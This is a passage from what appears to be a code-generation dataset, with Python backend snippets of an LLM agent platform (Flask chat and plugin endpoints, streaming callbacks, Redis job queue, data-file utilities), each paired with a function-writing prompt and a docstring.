mode="chat_memory",
)
return jsonify({
"recommend_questions": follow_questions["questions"],
"user_id": user_id,
"chat_id": chat_id,
})
except Exception as e:
import traceback
traceback.print_exc()
return {
"recommend_questions": [],
"user_id": user_id,
"chat_id": chat_id,
} | Recommends potential inputs for users. |
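A hedged example of a request body for the recommend endpoint above; the route is an assumption, while the keys match what the handler reads from the request JSON.

# Hypothetical client call to the question-recommendation endpoint.
import requests

resp = requests.post(
    "http://localhost:8000/api/recommend",                  # hypothetical route
    json={
        "chat_id": "example-chat-id",
        "parent_message_id": 1,
        "user_intent": "Show the top 10 rows of the table",
        "llm_name": "gpt-3.5-turbo-16k",
        "temperature": 0.7,
    },
)
print(resp.json()["recommend_questions"])   # a list of suggested follow-up questions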
188,453 | from typing import List
from flask import jsonify
from backend.app import app
DATA_TOOLS = [
{
"type": "language",
"id": "1cea1f39-fe63-4b08-83d5-fa4c93db0c87",
"name": "SQLQueryBuilder",
"name_for_human": "SQL",
"pretty_name_for_human": "SQL Query Generation",
"icon": "",
"description": "Using SQL as the programming language",
},
{
"type": "language",
"id": "0c135359-af7e-473b-8425-1393d2943b57",
"name": "PythonCodeBuilder",
"name_for_human": "Python",
"pretty_name_for_human": "Python Code Generation",
"icon": "",
"description": "Using Python as the programming language",
},
{
"type": "tool",
"id": "a86aebe1-a780-4038-a333-fb2a9d2d25fc",
"name": "Echarts",
"name_for_human": "Echarts",
"pretty_name_for_human": "Echarts",
"icon": "",
"description": "Enhancing the analyzing experience with interactive charts",
},
{
"type": "tool",
"id": "c7c826ba-5884-4e2b-b27c-fedea30c1749",
"name": "KaggleDataLoader",
"name_for_human": "Kaggle Data Search",
"pretty_name_for_human": "Kaggle Data Search",
"icon": "",
"description": "Search & Connect to kaggle datasets",
},
{
"type": "tool",
"id": "8f8e8dbc-ae5b-4950-9f4f-7f5238978806",
"name": "DataProfiling",
"name_for_human": "Data Profiling",
"pretty_name_for_human": "Data Profiling",
"icon": "",
"description": "Intelligent profiling for your data",
},
]
The provided code snippet includes necessary dependencies for implementing the `get_data_tool_list` function. Write a Python function `def get_data_tool_list() -> List[dict]` to solve the following problem:
Gets the data tool list.
Here is the function:
def get_data_tool_list() -> List[dict]:
"""Gets the data tool list. """
for i, tool in enumerate(DATA_TOOLS):
cache_path = f"backend/static/images/{tool['name']}.cache"
with open(cache_path, 'r') as f:
image_content = f.read()
DATA_TOOLS[i]["icon"] = image_content
return jsonify(DATA_TOOLS) | Gets the data tool list. |
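A sketch of how the per-tool icon cache files read by get_data_tool_list above might be produced. Whether the cache stores a raw base64 string or a full data URI is an assumption; the handler simply returns the file content verbatim in the "icon" field.

# Hypothetical helper for generating backend/static/images/<name>.cache files.
import base64

def build_icon_cache(tool_name: str, png_path: str) -> None:
    with open(png_path, "rb") as f:
        encoded = base64.b64encode(f.read()).decode("utf-8")
    with open(f"backend/static/images/{tool_name}.cache", "w") as f:
        f.write(f"data:image/png;base64,{encoded}")

# build_icon_cache("Echarts", "echarts_icon.png")   # hypothetical input file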
188,454 | import base64
import copy
import json
import os
import random
import traceback
from typing import Dict, List, Union
import requests
from flask import Response, request, stream_with_context
from retrying import retry
from backend.api.language_model import get_llm
from backend.app import app
from backend.main import message_id_register, message_pool, logger
from backend.utils.streaming import single_round_chat_with_agent_streaming
from backend.schemas import OVERLOAD, NEED_CONTINUE_MODEL, DEFAULT_USER_ID
from backend.main import api_key_pool
from real_agents.adapters.llm import BaseLanguageModel
from real_agents.adapters.agent_helpers import AgentExecutor, Tool
from real_agents.adapters.callbacks.agent_streaming import \
AgentStreamingStdOutCallbackHandler
from real_agents.adapters.data_model import DataModel, JsonDataModel
from real_agents.adapters.interactive_executor import initialize_plugin_agent
from real_agents.adapters.memory import ConversationReActBufferMemory
from real_agents.plugins_agent.plugins.utils import load_all_plugins_elements
from real_agents.plugins_agent.plugins.tool_selector import ToolSelector
from real_agents.plugins_agent import PluginExecutor
def make_request(_image_url) -> Response:
response = requests.get(_image_url) # Replace with your actual request code
response.raise_for_status() # Raise an exception for unsuccessful response status codes
return response | null |
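Since this entry imports the retrying package, a minimal sketch of wrapping make_request above with its retry decorator follows; the retry policy (three attempts with a fixed one-second wait) is an assumption chosen for illustration.

# Hedged sketch: retry wrapper around the image request; policy values are illustrative.
from retrying import retry
import requests

@retry(stop_max_attempt_number=3, wait_fixed=1000)
def make_request_with_retry(_image_url: str) -> requests.Response:
    response = requests.get(_image_url)
    response.raise_for_status()   # an unsuccessful status raises and triggers a retry
    return response

# image_response = make_request_with_retry("https://example.com/icon.png")   # illustrative URL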
188,455 | import base64
import copy
import json
import os
import random
import traceback
from typing import Dict, List, Union
import requests
from flask import Response, request, stream_with_context
from retrying import retry
from backend.api.language_model import get_llm
from backend.app import app
from backend.main import message_id_register, message_pool, logger
from backend.utils.streaming import single_round_chat_with_agent_streaming
from backend.schemas import OVERLOAD, NEED_CONTINUE_MODEL, DEFAULT_USER_ID
from backend.main import api_key_pool
from real_agents.adapters.llm import BaseLanguageModel
from real_agents.adapters.agent_helpers import AgentExecutor, Tool
from real_agents.adapters.callbacks.agent_streaming import \
AgentStreamingStdOutCallbackHandler
from real_agents.adapters.data_model import DataModel, JsonDataModel
from real_agents.adapters.interactive_executor import initialize_plugin_agent
from real_agents.adapters.memory import ConversationReActBufferMemory
from real_agents.plugins_agent.plugins.utils import load_all_plugins_elements
from real_agents.plugins_agent.plugins.tool_selector import ToolSelector
from real_agents.plugins_agent import PluginExecutor
global plugins
plugins = []
try:
tool_selector = ToolSelector(tools_list=plugins, mode="embedding", api_key_pool=api_key_pool)
except Exception as e:
print(e, "The auto selection feature of plugins agent will return random elements.")
tool_selector = None
plugins.append(
{
"id": plugin_type,
"name": plugin_type,
"name_for_human": plugin_info["meta_info"]["manifest"]["name_for_human"],
"description": plugin_info["description"],
"icon": encoded_image,
"require_api_key": plugin_info["need_auth"],
}
)
def create_plugins_interaction_executor(
selected_plugins: List[str],
api_key_info: List[Dict],
llm: BaseLanguageModel,
llm_name: str,
) -> AgentExecutor:
"""Creates an agent executor for interaction.
Args:
selected_plugins: A list of selected plugins.
api_key_info: A list of plugin api keys.
llm: A llm model.
llm_name: A string llm name.
Returns:
An agent executor.
"""
# Initialize memory
memory = ConversationReActBufferMemory(memory_key="chat_history",
return_messages=True, style="plugin",
max_token_limit=10000)
class RunPlugin:
def __init__(self, plugin: PluginExecutor, llm: BaseLanguageModel):
self.plugin = plugin
self.llm = llm
def run(self, term: str) -> Union[str, Dict, DataModel]:
try:
raw_observation = self.plugin.run(user_intent=term, llm=self.llm)
input_json, output = raw_observation["input_json"], raw_observation[
"api_output"]
observation = JsonDataModel.from_raw_data(
{
"success": True,
"result": json.dumps(output, indent=4) if isinstance(output,
dict) else output,
"intermediate_steps": json.dumps(input_json, indent=4),
}
)
return observation
except Exception as e:
observation = JsonDataModel.from_raw_data(
{
"success": False,
"result": str(e),
}
)
print(traceback.format_exc())
return observation
# Load plugins from selected names
_plugins = []
for selected_plugin in selected_plugins:
plugin = PluginExecutor.from_plugin_name(selected_plugin)
llm = copy.deepcopy(llm)
if len([i for i in api_key_info if i["tool_name"] == plugin.name]) != 0:
plugin.api_key = \
[i for i in api_key_info if i["tool_name"] == plugin.name][0]["api_key"]
# For some plugins, we need to reload the plugin to update personal data
plugin.load_personnel_info() # warning: this will change the plugin object every time we make a new query
run_plugin = RunPlugin(plugin, llm)
_plugins.append(Tool(name=plugin.name, func=run_plugin.run,
description=plugin.full_description))
continue_model = llm_name if llm_name in NEED_CONTINUE_MODEL else None
interaction_executor = initialize_plugin_agent(
_plugins, llm, continue_model, memory=memory, verbose=True
)
return interaction_executor
def get_llm(llm_name: str, **kwargs) -> BaseLanguageModel:
"""Gets the llm model by its name."""
if llm_name in ["gpt-3.5-turbo-16k", "gpt-4"]:
openai_api_type = os.getenv("OPENAI_API_TYPE", "open_ai")
if openai_api_type == "open_ai":
chat_openai = ChatOpenAI
kwargs.update({"model_name": llm_name})
elif openai_api_type == "azure":
chat_openai = AzureChatOpenAI
kwargs.update({"deployment_name": llm_name})
return chat_openai(
streaming=True,
verbose=True,
**kwargs
)
elif llm_name in ["claude-v1", "claude-2"]:
anthropic_api_key = os.getenv("ANTHROPIC_API_KEY", "")
return ChatAnthropic(
model=llm_name,
streaming=True,
verbose=True,
anthropic_api_key=anthropic_api_key,
**kwargs,
)
elif llm_name == "lemur-chat":
return ChatOpenAI(
model_name="lemur-70b-chat-v1",
streaming=True,
openai_api_base="https://model-api.xlang.ai/v1",
verbose=True,
max_tokens=2048,
**kwargs
)
else:
raise ValueError(f"llm_name {llm_name} not found")
logger = init_log(
error=os.path.join(".logging", "error.log"),
runtime=os.path.join(".logging", "runtime.log"),
serialize=os.path.join(".logging", "serialize.log"),
trace=os.path.join(".logging", "trace.log"),
)
message_pool: MessageMemoryManager = MessageMemoryManager(name="message_pool", backend=MESSAGE_MEMORY_MANAGER_BACKEND)
api_key_pool: UserMemoryManager = UserMemoryManager(name="api_key_pool", backend=API_KEY_MEMORY_MANAGER_BACKEND)
message_id_register = VariableRegister(name="message_id_register", backend=VARIABLE_REGISTER_BACKEND)
def single_round_chat_with_agent_streaming(
stream_handler: AgentStreamingStdOutCallbackHandler,
interaction_executor: AgentExecutor,
user_intent: str,
human_message_id: int,
ai_message_id: int,
user_id: str,
chat_id: str,
message_list: List[Dict[str, Any]],
parent_message_id: int,
llm_name: str,
app_type: str = "plugins",
) -> Any:
"""Streams the response of the agent to the frontend."""
assert app_type in APP_TYPES, f"app_type should be one of {APP_TYPES}"
with multiprocess.Manager() as share_manager:
err_pool: Dict[str, Any] = share_manager.dict()
memory_pool: Dict[str, Any] = share_manager.dict()
share_list = share_manager.list()
memory_pool[chat_id] = []
stream_handler.for_display = share_list
chat_thread = multiprocess.Process(
target=_wrap_agent_caller,
args=(
interaction_executor,
{
"input": user_intent,
},
chat_id,
err_pool,
memory_pool,
[stream_handler],
),
)
threading_pool.register_thread(chat_id, chat_thread)
chat_thread.start()
empty_s_time: float = -1
last_heartbeat_time: float = -1
timeout = TIME_OUT_MAP[app_type]
LEFT_SIGN = "("
RIGHT_SIGN = ")"
start_buffer = False
streamed_transition_text_buffer = ""
streamed_links = []
converted_card_info_list = []
yield pack_json(
{
"human_message_id": human_message_id,
"ai_message_id": ai_message_id,
}
)
# Display streaming to frontend
display_stream = DisplayStream(execution_result_max_tokens=EXECUTION_RESULT_MAX_TOKENS_MAP[app_type])
is_block_first, current_block_type = False, None
intermediate_list, final_list = [], [] # Only for database storage
try:
while chat_thread.is_alive() or len(stream_handler.for_display) > 0:
# print(memory_pool, err_pool, "out")
if stream_handler.is_end:
# The ending of the streaming is marked by the is_end variable from AgentStreamingStdOutCallbackHandler in agent_streaming.py
break
if len(stream_handler.for_display) == 0:
# first time display list is empty
if empty_s_time == -1:
empty_s_time = time.time()
# already empty for some time
else:
if time.time() - empty_s_time > timeout and chat_thread.is_alive():
threading_pool.timeout_thread(chat_id)
break
if last_heartbeat_time == -1:
last_heartbeat_time = time.time()
else:
if time.time() - last_heartbeat_time > HEARTBEAT_INTERVAL and chat_thread.is_alive():
last_heartbeat_time = -1
yield _streaming_token(
{"text": "🫀", "type": "heartbeat", "final": False}, False, user_id, chat_id, False
)
else:
empty_s_time = -1
last_heartbeat_time = -1
while len(stream_handler.for_display) > 0:
token = stream_handler.for_display.pop(0)
items_to_display = display_stream.display(token)
# Skip the "identifier" and "key" token
if items_to_display is None:
continue
for item in items_to_display:
# Check if the block type is changed
if item["type"] != current_block_type:
current_block_type = item["type"]
is_block_first = True
else:
is_block_first = False
is_final = item.get("final", False)
# Render the item(s)
if item["type"] in STREAM_BLOCK_TYPES:
# Render image and echarts as block
yield _streaming_block(item, is_final, user_id, chat_id)
elif item["type"] in STREAM_TOKEN_TYPES:
# Render the rest as plain text
item["text"] = _render_preprocess(item["text"])
yield _streaming_token(item, is_final, user_id, chat_id, is_block_first)
# Save the intermediate steps and final answer
if is_final:
final_list.append(item)
else:
intermediate_list.append(item)
if item["type"] == "transition" and item["text"] == RIGHT_SIGN:
start_buffer = False
link = streamed_transition_text_buffer
streamed_transition_text_buffer = ""
card_info_list = extract_card_info_from_text(link)
# empty the buffer after extracting card info
streamed_transition_text_buffer = ""
if len(card_info_list) > 0:
streaming_card_info_list: list[dict[str, Any]] = [
{
"final_answer": {
"text": json.dumps(card_info),
"type": "card_info",
},
"is_block_first": False,
"streaming_method": "card_info",
"user_id": user_id,
"chat_id": chat_id,
}
for card_info in card_info_list
]
streamed_links.extend([card_info["web_link"] for card_info in card_info_list])
converted_card_info_list.extend(
[
{
"text": stream_card_info["final_answer"]["text"],
"type": stream_card_info["final_answer"]["type"],
}
for stream_card_info in streaming_card_info_list
]
)
for streaming_card_info in streaming_card_info_list:
yield pack_json(streaming_card_info)
if start_buffer == True:
streamed_transition_text_buffer += item["text"]
if item["type"] == "transition" and item["text"] == LEFT_SIGN:
start_buffer = True
except Exception as e:
import traceback
traceback.print_exc()
# Wait for the chat thread to finish
chat_thread.join()
stop_flag, timeout_flag, error_msg = threading_pool.flush_thread(chat_id)
error_msg = err_pool.pop(chat_id, None)
# Response Error!!
if stop_flag:
yield pack_json({"success": False, "error": "stop"})
return
elif timeout_flag:
yield pack_json({"success": False, "error": "timeout"})
return
elif error_msg is not None:
error_msg_to_render = error_rendering(error_msg)
yield pack_json({"success": False, "error": "internal", "error_msg": error_msg_to_render})
return
elif len(memory_pool[chat_id]) == 0:
yield pack_json({"success": False, "error": "internal"})
return
# Response Success!!
message_list_from_memory = memory_pool[chat_id]
del stream_handler
# share_manager.shutdown()
del memory_pool, err_pool, share_list, share_manager, interaction_executor
# Save conversation to memory
new_human_message = message_list_from_memory[-2]
new_ai_message = message_list_from_memory[-1]
new_human_message.update({"message_id": human_message_id, "parent_message_id": parent_message_id})
new_ai_message.update({"message_id": ai_message_id, "parent_message_id": human_message_id})
message_list.extend([new_human_message, new_ai_message])
logger.bind(user_id=user_id, chat_id=chat_id, api="/chat", msg_head="New human message").debug(new_human_message)
logger.bind(user_id=user_id, chat_id=chat_id, api="/chat", msg_head="New ai message").debug(new_ai_message)
MessageMemoryManager.set_pool_info_with_id(message_pool, user_id, chat_id, message_list)
# Save conversation to database
db = get_user_conversation_storage()
# Combine the streaming tokens/blocks
intermediate_list_combined = _combine_streaming(intermediate_list)
final_list_combined = _combine_streaming(final_list)
if len(converted_card_info_list) > 0:
final_list_combined.extend(converted_card_info_list)
    # Insert the user message; when regenerating there is no need to insert it again
db.message.insert_one(
{
"conversation_id": chat_id,
"user_id": user_id,
"message_id": human_message_id,
"parent_message_id": parent_message_id,
"version_id": 0,
"role": "user",
"data_for_human": user_intent,
"data_for_llm": message_list[-2]["message_content"],
"raw_data": None,
}
)
# Insert AI Message
db.message.insert_one(
{
"conversation_id": chat_id,
"user_id": user_id,
"message_id": ai_message_id,
"parent_message_id": human_message_id,
"version_id": 0,
"role": "assistant",
"data_for_human": {
"intermediate_steps": intermediate_list_combined,
"final_answer": final_list_combined,
},
"data_for_llm": message_list[-1]["message_content"],
"raw_data": None,
}
)
OVERLOAD = 503
DEFAULT_USER_ID = "DefaultUser"
class AgentStreamingStdOutCallbackHandler(StreamingStdOutCallbackHandler):
is_end = False
generated_tokens: list = []
for_display: list = []
# Automata
pda = JSON_PDA()
llm_call_id = 0
_in_json = False
_in_key = False
_in_value = False
_direct_display = True
_normal_json = False
json_key: str = ""
json_tmp_stack: list = []
action_key_appear = False
def always_verbose(self) -> bool:
"""Whether to call verbose callbacks even if verbose is False."""
return True
def on_llm_start(self, serialized: Dict[str, Any], prompts: List[str], **kwargs: Any) -> None:
self.is_end = False
self.generated_tokens = []
self.pda = JSON_PDA()
self.llm_call_id += 1
self._in_json = False
self._in_key = False
self._in_value = False
self._direct_display = True
self._normal_json = False
self.json_key = ""
self.json_tmp_stack = []
def on_llm_new_token(self, token: str, **kwargs: Any) -> None:
"""
Run on new LLM token. Only available when streaming is enabled.
The tokens that we can decide their types ('plain', 'identifier', 'key', 'action', 'action_input') are stored in `self.for_display`.
"""
self.generated_tokens.append(token)
        # Automaton that monitors the JSON block
for char in token:
self.pda.transition(char)
# Handle the logic of sentences and json blocks
_type = "plain"
if self.pda.state in ["open_brace", "open_one_backtick"]:
self._in_json = True
self._direct_display = False
self._normal_json = False
self.action_key_appear = False
if self._in_json and not self._normal_json:
_type = "identifier"
if self.pda.state == "in_block":
_type = "plain"
self._normal_json = True
if self.pda.state == "open_key_quote":
if self._in_key:
self.json_key += char
_type = "key"
self._in_key = True
else:
self._in_key = False
if self.pda.state == "open_value_quote" or self.pda.state == "open_value_quote_brace":
if self._in_value:
_type = self.json_key
self._in_value = True
else:
if self._in_value:
self.json_key = ""
self._in_value = False
if self.pda.state == "close_key_quote":
# Normal json block
if self.json_key not in ["action", "action_input"]:
for char_item in self.json_tmp_stack:
self.for_display.append(
{"text": char_item["text"], "type": "plain", "llm_call_id": self.llm_call_id}
)
self.json_tmp_stack = []
self.for_display.append({"text": char, "type": "plain", "llm_call_id": self.llm_call_id})
self._normal_json = True
continue
else:
if self.json_key == "action":
self.action_key_appear = True
elif self.json_key == "action_input" and self.action_key_appear:
# Action json block
for char_item in self.json_tmp_stack:
char_item["llm_call_id"] = self.llm_call_id
self.for_display.append(char_item)
self.json_tmp_stack = []
self._direct_display = True
else:
for char_item in self.json_tmp_stack:
self.for_display.append(
{"text": char_item["text"], "type": "plain", "llm_call_id": self.llm_call_id}
)
self.json_tmp_stack = []
self._direct_display = True
if self.pda.state == "start":
self._in_json = False
self.for_display.append(
{"text": char, "type": _type, "llm_call_id": self.llm_call_id}
) if self._direct_display else self.json_tmp_stack.append(
{"text": char, "type": _type, "llm_call_id": self.llm_call_id}
)
def on_llm_end(self, response, **kwargs: Any) -> None:
"""Run when LLM ends running."""
self.is_end = True
for char_item in self.json_tmp_stack:
self.for_display.append({"text": char_item["text"], "type": "plain", "llm_call_id": self.llm_call_id})
def on_tool_end(self, output: Union[DataModel, str], **kwargs: Any) -> None:
"""Run on tool end to add observation data model."""
self.for_display.append({"text": output, "type": "block", "llm_call_id": self.llm_call_id})
The provided code snippet includes necessary dependencies for implementing the `chat_xlang_plugin` function. Write a Python function `def chat_xlang_plugin() -> Dict` to solve the following problem:
Returns the chat response of plugins agent.
Here is the function:
def chat_xlang_plugin() -> Dict:
"""Returns the chat response of plugins agent."""
try:
# Get request parameters
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
user_intent = request_json["user_intent"]
parent_message_id = request_json["parent_message_id"]
selected_plugins = request_json["selected_plugins"]
llm_name = request_json["llm_name"]
temperature = request_json.get("temperature", 0.4)
stop_words = ["[RESPONSE_BEGIN]", "TOOL RESPONSE"]
kwargs = {
"temperature": temperature,
"stop": stop_words,
}
# pass user id and chat id to tool selector
if tool_selector:
tool_selector.user_id = user_id
tool_selector.chat_id = chat_id
# Get language model
llm = get_llm(llm_name, **kwargs)
logger.bind(user_id=user_id, chat_id=chat_id, api="/chat",
msg_head="Request json").debug(request_json)
# Get API key for plugins
api_key_info = api_key_pool.get_pool_info_with_id(user_id,
default_value=[]) # fixme: mock user_id: 1
activated_message_list = message_pool.get_activated_message_list(user_id,
chat_id,
list(),
parent_message_id)
# Flag for auto retrieving plugins
if len(selected_plugins) == 1 and selected_plugins[0].lower() == "auto":
if tool_selector:
# this will return a list of plugin names sorted by relevance (lower case and the same as their dir name)
query = tool_selector.load_query_from_message_list(activated_message_list,
user_intent)
selected_plugins = tool_selector.select_tools(query=query, top_k=5)
else:
selected_plugins = [_plugin['id'] for _plugin in random.sample(plugins, 5)]
# Build executor and run chat
stream_handler = AgentStreamingStdOutCallbackHandler()
interaction_executor = create_plugins_interaction_executor(
selected_plugins=selected_plugins,
api_key_info=api_key_info,
llm=llm,
llm_name=llm_name,
)
message_pool.load_agent_memory_from_list(interaction_executor.memory,
activated_message_list)
human_message_id = message_id_register.add_variable(user_intent)
ai_message_id = message_id_register.add_variable("")
return stream_with_context(
Response(
single_round_chat_with_agent_streaming(
interaction_executor=interaction_executor,
user_intent=user_intent,
human_message_id=human_message_id,
ai_message_id=ai_message_id,
user_id=user_id,
chat_id=chat_id,
message_list=activated_message_list,
parent_message_id=parent_message_id,
stream_handler=stream_handler,
llm_name=llm_name,
app_type="plugins",
),
content_type="application/json",
)
)
except Exception as e:
import traceback
traceback.print_exc()
return Response(response=None,
status=f"{OVERLOAD} backend is currently overloaded") | Returns the chat response of plugins agent. |
188,456 | from typing import Dict, Optional, List
import json
import base64
import re
import ast
import mo_sql_parsing
from pydantic import BaseModel
from real_agents.adapters.data_model import MessageDataModel, DataModel
def split_text_and_code(text: str) -> List:
pattern = r"(```[\s\S]+?```)"
result = [x for x in re.split(pattern, text) if x.strip()]
return result | null |
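A short usage sketch of split_text_and_code; because the pattern is a capture group, re.split keeps the fenced block as its own list item:
text = "Here is the query:\n```sql\nSELECT 1;\n```\nDone."
print(split_text_and_code(text))
# ['Here is the query:\n', '```sql\nSELECT 1;\n```', '\nDone.']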
188,457 | from typing import Dict, Optional, List
import json
import base64
import re
import ast
import mo_sql_parsing
from pydantic import BaseModel
from real_agents.adapters.data_model import MessageDataModel, DataModel
def is_json(text: str) -> bool:
try:
json.loads(text)
return True
except json.JSONDecodeError:
return False
def detect_code_type(code) -> str:
# Attempt Python parsing
try:
ast.parse(code)
return "python"
except SyntaxError:
pass
# Attempt SQL parsing
try:
mo_sql_parsing.parse(code)
return "sql"
    except Exception:
pass
# If all else fails, it's probably plain text
return "text"
The provided code snippet includes necessary dependencies for implementing the `add_backticks` function. Write a Python function `def add_backticks(text: str) -> str` to solve the following problem:
Add backticks to code blocks.
Here is the function:
def add_backticks(text: str) -> str:
"""Add backticks to code blocks."""
text_type = detect_code_type(text)
if is_json(text):
text = "```json\n" + text + "\n```"
elif text_type == "python":
if not text.startswith("```") and not text.endswith("```"):
text = "```python\n" + text + "\n```"
elif text_type == "sql":
if not text.startswith("```") and not text.endswith("```"):
text = "```sql\n" + text + "\n```"
return text | Add backticks to code blocks. |
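A minimal usage sketch of the helpers above; the sample snippets are illustrative:
samples = [
    "def add(a, b):\n    return a + b",            # detected as python, wrapped in ```python
    "SELECT name FROM users WHERE age > 30",        # detected as sql, wrapped in ```sql
    '{"action": "search", "action_input": "sf"}',   # valid JSON, wrapped in ```json
]
for sample in samples:
    print(add_backticks(sample))
    print("---")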
188,458 | import redis
from typing import Any
from backend.utils.utils import logger
import os
r = redis.Redis(host=os.getenv("REDIS_SERVER"), port=6379, decode_responses=True)
QUEUE_RUNNING = "kernel_running_queue"
QUEUE_PENDING = "kernel_pending_queue"
SUBMIT_EVENT = "job_submitted"
COMPLETE_EVENT = "job_completed"
def handle_job_completion(message: dict) -> None:
def handle_new_job(message: dict) -> None:
def start_kernel_publisher() -> None:
# Connect to Redis
r.delete(QUEUE_RUNNING)
r.delete(QUEUE_PENDING)
# Start the publisher & subscriber
p = r.pubsub()
p.subscribe(**{COMPLETE_EVENT: handle_job_completion, SUBMIT_EVENT: handle_new_job})
p.run_in_thread(sleep_time=0.1) | null |
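A hypothetical producer-side sketch for this publisher. The handler bodies are elided above, so the payload fields below are assumptions; only the channel name comes from the code:
import json
import redis

producer = redis.Redis(host="localhost", port=6379, decode_responses=True)  # example host
job = {"chat_id": "chat-123", "code": "print(1 + 1)"}  # assumed payload schema
producer.publish(SUBMIT_EVENT, json.dumps(job))        # delivered to handle_new_job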
188,459 | import json
import re
import struct
import time
from typing import Any, Dict, List, Optional, Literal
import multiprocess
import requests
from bs4 import BeautifulSoup
from backend.display_streaming import DisplayStream
from backend.main import logger, message_pool, threading_pool
from backend.utils.user_conversation_storage import get_user_conversation_storage
from backend.utils.utils import error_rendering
from backend.memory import MessageMemoryManager
from backend.schemas import (
APP_TYPES,
TIME_OUT_MAP,
HEARTBEAT_INTERVAL,
STREAM_BLOCK_TYPES,
STREAM_TOKEN_TYPES,
EXECUTION_RESULT_MAX_TOKENS_MAP,
)
from real_agents.data_agent import DataSummaryExecutor
from real_agents.adapters.callbacks.agent_streaming import AgentStreamingStdOutCallbackHandler
from real_agents.adapters.agent_helpers import Agent, AgentExecutor
from real_agents.adapters.llm import BaseLanguageModel
def check_url_exist(text: str) -> bool:
"""check in a text whether there is a url"""
# this regex extracts the http(s) with whitespace or () in the beginning and end, since usually the url is surrounded by whitespace or ()
# e.g. " https://google.com " or "(https://google.com)"
url_regex = r"(http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+)"
links = re.findall(url_regex, text)
return len(links) > 0
def extract_title_and_image_links(url: str) -> (tuple[Literal[''], list] | tuple[Any, list]):
try:
res = requests.get(url, timeout=3)
if res.status_code != 200:
return "", []
soup = BeautifulSoup(res.text, "html.parser")
title_tag = soup.find_all("title")[0].text
img_tags = soup.find_all("img")
# List to store image links with large width and height
large_img_links = []
# List to store all image links
all_img_links = []
for img in img_tags:
if "src" in img.attrs:
all_img_links.append(img["src"])
# Check if width and height attributes exist and add to the large list
if "width" in img.attrs and "height" in img.attrs:
# Ensure the width and height attributes can be converted to integers
if int(img["width"]) > 100 and int(img["height"]) > 100:
large_img_links.append(img["src"])
else:
continue
        # If large images were found, use those; otherwise fall back to an empty list
img_links = large_img_links if large_img_links else []
# fixme: handle the case there are no such tags
return title_tag, img_links
except requests.exceptions.Timeout:
print("Request timed out!")
return "", []
except Exception as e:
print(f"Error processing {url}: {e}")
return "", []
def extract_card_info_from_links(links: List[str]) -> list[dict[str, Any]]:
rt = []
for link in links:
if check_url_exist(link):
title, image_links = extract_title_and_image_links(link)
if len(image_links) > 0:
selected_image_link = image_links[0]
else:
selected_image_link = "" # no image in this website
rt.append({"title": title, "web_link": link, "image_link": selected_image_link})
else:
continue
return rt | null |
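A usage sketch for the link-card helpers above (requires network access; the URL is only an example):
cards = extract_card_info_from_links(["https://www.python.org"])
for card in cards:
    print(card["title"], card["web_link"], card["image_link"] or "<no image>")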
188,460 | import os
import sys
import base64
from pathlib import Path
from typing import Any, Dict, Tuple, Union
import pandas as pd
import tiktoken
from flask import Request
from sqlalchemy import create_engine
from PIL import Image
from loguru import logger
from real_agents.adapters.data_model import (
DatabaseDataModel,
DataModel,
ImageDataModel,
TableDataModel,
KaggleDataModel,
)
from real_agents.data_agent import (
DataSummaryExecutor,
TableSummaryExecutor,
ImageSummaryExecutor,
)
from real_agents.adapters.schema import SQLDatabase
from backend.utils.running_time_storage import get_running_time_storage
from backend.app import app
from backend.schemas import DEFAULT_USER_ID
DOCUMENT_EXTENSIONS = {"pdf", "doc", "docx", "txt"}
def is_document_file(filename: Union[str, Path]) -> bool:
if isinstance(filename, str):
filename = Path(filename)
suffix = filename.suffix[1:]
if suffix in DOCUMENT_EXTENSIONS:
return True
else:
return False | null |
188,461 | import os
import sys
import base64
from pathlib import Path
from typing import Any, Dict, Tuple, Union
import pandas as pd
import tiktoken
from flask import Request
from sqlalchemy import create_engine
from PIL import Image
from loguru import logger
from real_agents.adapters.data_model import (
DatabaseDataModel,
DataModel,
ImageDataModel,
TableDataModel,
KaggleDataModel,
)
from real_agents.data_agent import (
DataSummaryExecutor,
TableSummaryExecutor,
ImageSummaryExecutor,
)
from real_agents.adapters.schema import SQLDatabase
from backend.utils.running_time_storage import get_running_time_storage
from backend.app import app
from backend.schemas import DEFAULT_USER_ID
The provided code snippet includes necessary dependencies for implementing the `remove_nan` function. Write a Python function `def remove_nan(file_path: str) -> None` to solve the following problem:
We only support csv files in the current version. By default, we remove columns that contain only nan values. For columns that have both nan values and non-nan values, we replace nan values with the mean (number type) or the mode (other type).
Here is the function:
def remove_nan(file_path: str) -> None:
"""
We only support csv file in the current version
By default, we remove columns that contain only nan values
For columns that have both nan values and non-nan values, we replace nan values with the mean (number type)
or the mode (other type)
"""
if file_path.endswith("csv"):
df = pd.read_csv(file_path)
columns = list(df.columns)
nan_columns = []
for c in columns:
if all(list(df[c].isnull())):
nan_columns.append(c)
df.drop(columns=nan_columns, inplace=True)
columns = list(df.columns)
for c in columns:
try:
                fillin_value = df[c].mean()
            except Exception:
                # mode() returns a Series; take its first (most frequent) value
                fillin_value = df[c].mode()[0]
df[c].fillna(value=fillin_value, inplace=True)
df.to_csv(file_path) | We only support csv file in the current version By default, we remove columns that contain only nan values For columns that have both nan values and non-nan values, we replace nan values with the mean (number type) or the mode (other type) |
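A self-contained demo of remove_nan on a throwaway CSV written to the current directory; the column names are illustrative:
import numpy as np
import pandas as pd

demo = pd.DataFrame({
    "age": [20.0, np.nan, 40.0],           # partly missing -> filled with the mean
    "city": ["NY", "SF", None],            # non-numeric -> filled with the mode
    "empty": [np.nan, np.nan, np.nan],     # all-NaN column -> dropped
})
demo.to_csv("demo.csv", index=False)
remove_nan("demo.csv")
print(pd.read_csv("demo.csv"))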
188,462 | import os
import sys
import base64
from pathlib import Path
from typing import Any, Dict, Tuple, Union
import pandas as pd
import tiktoken
from flask import Request
from sqlalchemy import create_engine
from PIL import Image
from loguru import logger
from real_agents.adapters.data_model import (
DatabaseDataModel,
DataModel,
ImageDataModel,
TableDataModel,
KaggleDataModel,
)
from real_agents.data_agent import (
DataSummaryExecutor,
TableSummaryExecutor,
ImageSummaryExecutor,
)
from real_agents.adapters.schema import SQLDatabase
from backend.utils.running_time_storage import get_running_time_storage
from backend.app import app
from backend.schemas import DEFAULT_USER_ID
def is_valid_input(user_intent: str, max_token_limit: int = 2000) -> bool:
enc = tiktoken.get_encoding("cl100k_base")
tokens = len(enc.encode(user_intent))
return tokens <= max_token_limit | null |
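A quick sanity check of the token-limit guard (requires the tiktoken package; the inputs are illustrative):
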